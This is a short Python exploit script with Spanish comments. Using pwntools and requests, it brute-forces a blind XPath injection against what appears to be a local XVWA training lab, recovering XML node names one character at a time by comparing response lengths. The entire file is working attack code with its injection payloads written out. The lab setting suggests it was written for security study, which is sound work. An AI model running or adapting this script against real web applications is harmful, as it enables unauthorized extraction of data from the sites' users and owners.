#!/var/bin/env python


import pdb
import requests
import signal
import string
import sys
import time

from pwn import *

# Ctrl-C handler


def signal_handler(signal, frame):

    print('\n\n[!] Ctrl-C. Saliendo...')
    sys.exit(1)


signal.signal(signal.SIGINT, signal_handler)


# Variables globales

main_url = "http://192.168.1.142/xvwa/vulnerabilities/xpath/"
characters = string.ascii_letters


def xPathInjection():

    data = ""

    p1 = log.progress("Inyeccion XPath")
    p1.status("Iniciando ataque de fuerza bruta")

    time.sleep(2)

    p2 = log.progress("Data")

    for position in range(1, 8):

        for character in characters:
            # post_data = {
            #     'search': "1' and substring(name(/*[1]),%d,1)='%s" % (position, character),
            #     'submit': ''
            # }

            post_data = {
                'search': "1' and substring(name(/*[1]/*[1]),%d,1)='%s" % (position, character),
                'submit': ''
            }

            r = requests.post(main_url, data=post_data)

            if len(r.text) != 8686:

                data += character
                p2.status(data)
                break

    p1.success("Inyeccion XPath completada")
    p2.success("Data: %s" % data)


if __name__ == "__main__":

    xPathInjection()